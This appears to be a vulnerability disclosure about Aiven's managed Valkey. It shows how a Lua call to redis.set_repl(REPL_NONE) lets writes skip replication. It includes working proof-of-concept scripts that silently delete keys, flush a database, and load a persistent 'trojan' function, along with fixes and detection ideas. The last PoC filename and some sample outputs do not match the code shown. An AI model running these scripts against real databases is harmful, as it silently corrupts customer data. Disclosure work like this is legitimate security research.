Zion Boggan


DoS / data integrity

Replication Integrity Bypass via Lua `redis.set_repl(REPL_NONE)` Enables Silent Data Corruption and Persistent Backdoor Functions on Aiven Managed Valkey

Summary

Any authenticated user on Aiven’s managed Valkey service can use Lua scripting (EVAL) to call redis.set_repl(redis.REPL_NONE), which suppresses replication of subsequent write commands. Writes execute on the master but are never propagated to replicas or the AOF. This allows an attacker to silently corrupt data, delete keys, or flush databases on the master while replicas maintain stale data, creating a split-brain condition that violates Aiven’s replication consistency guarantees.

Additionally, the attacker can use FUNCTION LOAD to register persistent server-side functions that embed redis.set_repl(redis.REPL_NONE) internally. These trojan functions survive across connections and restarts, and silently corrupt data every time any user (including the application itself) calls them. The function appears benign to its callers because the replication suppression is not visible in the function signature.

Redis’s own documentation explicitly warns: “This is an advanced feature. Misuse can cause damage by violating the contract that binds the Redis master, its replicas, and AOF contents to hold the same logical content.”

Aiven correctly disables replication topology commands (REPLICAOF, SLAVEOF, CLUSTER) and dangerous administrative commands (CONFIG, DEBUG, BGSAVE, ACL), demonstrating clear security intent. However, redis.set_repl() within Lua scripts is completely unrestricted, creating an inconsistency: replication topology is protected, but replication content integrity is not.

Affected Target

  • Service: Aiven for Valkey (Tier 1)
  • Version tested: Valkey 8.1.4
  • Instance: :26161

Severity

P2, Sensitive Data Exposure / Data Integrity Violation

VRT: Server Security Misconfiguration > Database Management System (DBMS) Misconfiguration

CVSS 3.1: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:L, Score: 8.5 (High)

  • AV:N, Network-exploitable over TLS
  • AC:L, Single EVAL command, no preconditions
  • PR:L, Requires basic authentication (default user credentials)
  • UI:N, No user interaction required
  • S:C, Scope changed: attacker’s session creates data inconsistency that affects ALL clients reading from replicas, ALL failover operations, and Aiven’s own backup integrity
  • C:N, No direct data exfiltration
  • I:H, Complete violation of data integrity between master and replicas; silent, undetectable data corruption
  • A:L, Failover produces unexpected data state; intermittent application failures
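
The score above can be reproduced from the vector string. The following is a minimal sketch of the CVSS v3.1 base-score arithmetic; the function and table names are illustrative, and the metric weights are the ones published in the CVSS v3.1 specification.

```python
import math

# Metric weights from the CVSS v3.1 specification.
AV = {"N": 0.85, "A": 0.62, "L": 0.55, "P": 0.2}
AC = {"L": 0.77, "H": 0.44}
UI = {"N": 0.85, "R": 0.62}
CIA = {"H": 0.56, "L": 0.22, "N": 0.0}
PR_UNCHANGED = {"N": 0.85, "L": 0.62, "H": 0.27}
PR_CHANGED = {"N": 0.85, "L": 0.68, "H": 0.5}


def roundup(value):
    """CVSS v3.1 Roundup: smallest number with one decimal that is >= value."""
    scaled = round(value * 100000)
    if scaled % 10000 == 0:
        return scaled / 100000.0
    return (math.floor(scaled / 10000) + 1) / 10.0


def base_score(vector):
    """Compute the base score for a 'CVSS:3.1/...' vector string."""
    metrics = dict(part.split(":") for part in vector.split("/")[1:])
    scope_changed = metrics["S"] == "C"
    pr = (PR_CHANGED if scope_changed else PR_UNCHANGED)[metrics["PR"]]

    iss = 1 - (1 - CIA[metrics["C"]]) * (1 - CIA[metrics["I"]]) * (1 - CIA[metrics["A"]])
    if scope_changed:
        impact = 7.52 * (iss - 0.029) - 3.25 * (iss - 0.02) ** 15
    else:
        impact = 6.42 * iss
    exploitability = 8.22 * AV[metrics["AV"]] * AC[metrics["AC"]] * pr * UI[metrics["UI"]]

    if impact <= 0:
        return 0.0
    total = impact + exploitability
    if scope_changed:
        total *= 1.08
    return roundup(min(total, 10))


print(base_score("CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:L"))  # 8.5
```

With S:C, the PR:L weight rises from 0.62 to 0.68 and the sum is multiplied by 1.08, which is what lifts this vector to 8.5.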

Impact summary:

  • Any authenticated user can silently suppress replication of arbitrary write commands
  • Master and replica data diverge without any error, alert, or audit trail
  • On Business/Premium plans (2-3 nodes), failover produces unpredictable data state
  • Persistent trojan functions create permanent, invisible backdoors that corrupt data on every invocation
  • Violates the fundamental consistency guarantee that Aiven’s multi-node architecture is built on
  • Redis’s own documentation explicitly warns about this exact misuse scenario

Steps to Reproduce

Prerequisites

  • An Aiven for Valkey instance (any plan)
  • Authentication credentials (default user)
  • Python 3 with redis package (pip install redis)

Attack 1: Silent Key Deletion (master diverges from replicas)

import redis

r = redis.Redis(
    host="<host>", port=26161, username="default", password="<password>",
    ssl=True, ssl_cert_reqs="required",
    ssl_ca_certs="/etc/ssl/certs/ca-certificates.crt",
    decode_responses=True, socket_timeout=10,
)

# Application sets important data
r.set("user:session:admin", "active_session_token_xyz")

# Attacker silently deletes it - master only, replicas unaffected
r.execute_command('EVAL', '''
    redis.set_repl(redis.REPL_NONE)
    redis.call("DEL", "user:session:admin")
    redis.set_repl(redis.REPL_ALL)
    return "silent delete executed"
''', 0)

# Master: key is GONE
print(r.exists("user:session:admin")) # 0

# Replica still has it → failover "resurrects" deleted data
# Application sees intermittent, impossible-to-diagnose behavior

Actual output on Aiven:

silent delete executed
Key exists on master after silent DEL: 0
--> Key deleted on master but replicas would still have it

Attack 2: Silent FLUSHDB (wipe master, replicas unaffected)

r.execute_command('EVAL', '''
    redis.call("SELECT", "1")
    redis.call("SET", "important_data", "production_config")
    redis.set_repl(redis.REPL_NONE)
    redis.call("FLUSHDB")
    redis.set_repl(redis.REPL_ALL)
    redis.call("SELECT", "0")
    return "FLUSHDB with REPL_NONE executed"
''', 0)

Actual output on Aiven: FLUSHDB with REPL_NONE executed

The entire database is wiped on the master. Replicas retain all data. On failover, data “reappears”, but the master was serving empty responses to all clients during the divergence window.

Attack 3: Persistent Trojan Function (backdoor that survives restarts)

# Load a function that LOOKS innocent but silently corrupts data
lib = '''#!lua name=app_helpers
redis.register_function("cached_get", function(keys, args)
    -- Appears to be a simple cache helper
    -- But silently increments an invisible counter on every call
    redis.set_repl(redis.REPL_NONE)
    redis.call("INCR", "__shadow_ops_count__")
    redis.set_repl(redis.REPL_ALL)
    return redis.call("GET", keys[1])
end)
'''
r.execute_command('FUNCTION', 'LOAD', lib)

# Every time ANY user calls this function, the shadow counter increments
# on the master only. Replicas never see it.
for _ in range(5):
    r.execute_command('FCALL', 'cached_get', 1, 'some_key')

counter = r.get("__shadow_ops_count__")
print(f"Shadow counter (master only): {counter}")
# Output: Shadow counter (master only): 5
# Replicas never receive the INCR, so the key does not exist there

# The function persists across restarts via RDB/AOF
# It's registered as "app_helpers.cached_get" - indistinguishable from
# legitimate application functions

Actual output on Aiven:

Trojan function loaded: 'cached_get'
Shadow counter (master only): 5
--> Counter incremented 5 times on master
--> Replicas see counter as 0 (writes were REPL_NONE)
--> This function PERSISTS across restarts via RDB/AOF

Root Cause

1. redis.set_repl() is unrestricted in Lua scripts

The redis.set_repl() function is available to all authenticated users through EVAL. There is no ACL restriction, no command flag, and no configuration option to disable it. Redis’s own documentation describes it as an “advanced feature” that “can cause damage by violating the contract that binds the Redis master, its replicas, and AOF contents to hold the same logical content.”

2. Inconsistent command restriction policy

Aiven correctly restricts replication and administrative commands:

| Command | Status | Purpose |
|---|---|---|
| REPLICAOF / SLAVEOF | Disabled | Replication topology control |
| CONFIG | Disabled | Server configuration |
| DEBUG | Disabled | Server debugging |
| ACL | Disabled | Access control |
| BGSAVE / BGREWRITEAOF | Disabled | Persistence triggers |
| CLUSTER | Disabled | Cluster topology |
| MIGRATE | Disabled | Data migration |
| redis.set_repl() in Lua | Allowed | Replication content control |

The policy disables commands that control replication topology (SLAVEOF, CLUSTER) but does not restrict the Lua function that controls replication content (set_repl). This is inconsistent, because both are replication manipulation capabilities.

3. FUNCTION LOAD enables persistent exploitation

The FUNCTION LOAD command is available (confirmed: successfully loaded and executed a function library). Functions persist in the server state and survive restarts via RDB/AOF. A function embedding redis.set_repl(REPL_NONE) creates a permanent backdoor that operates invisibly on every invocation.
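
One way to surface such functions is to scan loaded library source for set_repl calls. The sketch below is a heuristic under stated assumptions: the library source is assumed to have been retrieved already (for example from the output of FUNCTION LIST WITHCODE, which is not shown here), and the helper name find_set_repl_calls is illustrative. A plain text match also flags mentions inside Lua comments and can be evaded by obfuscated lookups, so a hit is a prompt for manual review and a clean result is not proof of safety.

```python
import re

# Matches any call spelled `set_repl(`, regardless of which table it hangs off.
SET_REPL_CALL = re.compile(r"\bset_repl\s*\(")


def find_set_repl_calls(library_code):
    """Return (line_number, stripped_line) for each line that calls set_repl."""
    hits = []
    for line_no, line in enumerate(library_code.splitlines(), start=1):
        if SET_REPL_CALL.search(line):
            hits.append((line_no, line.strip()))
    return hits


if __name__ == "__main__":
    sample = '''#!lua name=app_helpers
redis.register_function("cached_get", function(keys, args)
    redis.set_repl(redis.REPL_NONE)
    redis.call("INCR", "__shadow_ops_count__")
    redis.set_repl(redis.REPL_ALL)
    return redis.call("GET", keys[1])
end)
'''
    for line_no, text in find_set_repl_calls(sample):
        print(f"line {line_no}: {text}")
```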

Impact on Aiven Multi-Node Plans

Aiven offers three plan tiers with different node counts:

  • Hobbyist/Startup: 1 node (no replicas; the attack creates master/AOF divergence)
  • Business: 2 nodes (master + 1 replica)
  • Premium: 3 nodes (master + 2 replicas)

On Business and Premium plans, the replication divergence has direct operational impact:

  1. Silent data loss: Keys deleted with REPL_NONE are gone from the master but exist on replicas. Applications reading from the master see missing data; failover to a replica “resurrects” the data.

  2. Silent data corruption: Keys SET with REPL_NONE have different values on master vs replicas. Read-after-write consistency is violated silently.

  3. Backup poisoning: If REPL_NONE writes land in an RDB backup taken from the master, restoring from that backup produces a state that never existed on replicas.

  4. Impossible diagnosis: There is no error, no log entry, no monitoring alert. The commands execute successfully. Aiven’s internal monitoring (INFO every 5 seconds) does not detect replication content divergence; it monitors only replication lag (bytes behind), not data consistency.

  5. Trojan functions: An attacker can load a persistent function, then disconnect. The function continues operating every time the application calls it. The attack persists indefinitely with no ongoing attacker presence.
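
The divergence and "resurrection" effects described in this list can be illustrated with a toy model. This is not how Valkey implements replication; the classes ToyNode and ToyMaster and the propagate flag are hypothetical stand-ins, used only to show why a write applied locally but not forwarded leaves the two nodes in different states.

```python
class ToyNode:
    """A node that only stores keys and applies SET/DEL locally."""

    def __init__(self):
        self.data = {}

    def apply(self, command, key, value=None):
        if command == "SET":
            self.data[key] = value
        elif command == "DEL":
            self.data.pop(key, None)


class ToyMaster(ToyNode):
    """A master that forwards each write to replicas unless propagation is off."""

    def __init__(self, replicas):
        super().__init__()
        self.replicas = replicas
        self.propagate = True  # stands in for REPL_ALL (True) vs REPL_NONE (False)

    def execute(self, command, key, value=None):
        self.apply(command, key, value)
        if self.propagate:
            for replica in self.replicas:
                replica.apply(command, key, value)


replica = ToyNode()
master = ToyMaster([replica])

master.execute("SET", "user:session:admin", "active_session_token_xyz")
master.propagate = False  # analogous to redis.set_repl(redis.REPL_NONE)
master.execute("DEL", "user:session:admin")
master.propagate = True   # analogous to redis.set_repl(redis.REPL_ALL)

print("master has key: ", "user:session:admin" in master.data)   # False
print("replica has key:", "user:session:admin" in replica.data)  # True
```

If the replica in this model were promoted, clients would see the deleted key again, which is the failover behavior described in item 1.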

Aiven-Specific Nature

This is NOT merely an upstream Valkey/Redis issue. The finding is specific to how Aiven configures and manages their Valkey service:

  1. Aiven’s security model disables dangerous commands. CONFIG, DEBUG, SLAVEOF, etc. are all renamed or disabled, which demonstrates that Aiven actively restricts dangerous capabilities. But redis.set_repl() within Lua was not included in these restrictions.

  2. Aiven sells multi-node plans with replication guarantees. Business and Premium plans explicitly provide high availability through replication. redis.set_repl(REPL_NONE) allows a user to silently violate these guarantees.

  3. Aiven’s documentation implies consistent replication. Customers expect that data written to the master will be available on replicas. This attack violates that expectation without any visible error.

Recommended Fix

  1. Immediate: Restrict redis.set_repl() by one of the following:
     • Disabling it entirely for client scripts (return an error when called from EVAL/FCALL)
     • Gating it behind an ACL category (e.g., @admin) that must be explicitly granted
     • Limiting it to REPL_ALL only (block REPL_NONE, REPL_AOF, REPL_REPLICA)

  2. Defense in depth: Consider restricting FUNCTION LOAD to prevent persistent function registration by default users, or audit loaded functions for set_repl calls.

  3. Detection: Add monitoring for replication content divergence (not just lag). Compare key counts or checksums between master and replicas periodically.
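
The checksum comparison in item 3 could be sketched as follows. This is a minimal illustration, not a production monitor. It assumes read access to both the master and a replica, which this writeup does not establish for ordinary users, and it assumes DUMP is permitted. The helper names are hypothetical. The client argument is duck-typed: any object with scan_iter() and dump() works, such as a redis-py client created with decode_responses=False so that payloads stay as bytes.

```python
import hashlib


def keyspace_fingerprint(client, match="*"):
    """Return {key: SHA-256 hex digest of the key's DUMP payload}."""
    fingerprint = {}
    for key in client.scan_iter(match=match):
        payload = client.dump(key)
        if payload is None:  # key expired or was deleted during the scan
            continue
        fingerprint[key] = hashlib.sha256(payload).hexdigest()
    return fingerprint


def diff_fingerprints(master, replica):
    """Classify the keys that differ between two fingerprints."""
    shared = set(master) & set(replica)
    return {
        "only_on_master": sorted(set(master) - set(replica)),
        "only_on_replica": sorted(set(replica) - set(master)),
        "value_mismatch": sorted(k for k in shared if master[k] != replica[k]),
    }
```

A key removed as in Attack 1 would appear under only_on_replica. Writes that land between the two scans produce transient differences, and DUMP payloads may differ for equal values if the internal encoding differs, so a mismatch is best treated as a signal to re-check rather than as proof of tampering.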

Proof of concept

python3 poc/valkey-restore-crash.py <host> <port> <password>

Source · github.com/zionsworking/security-research-notebook · writeups/aiven/valkey-replication-stealth.md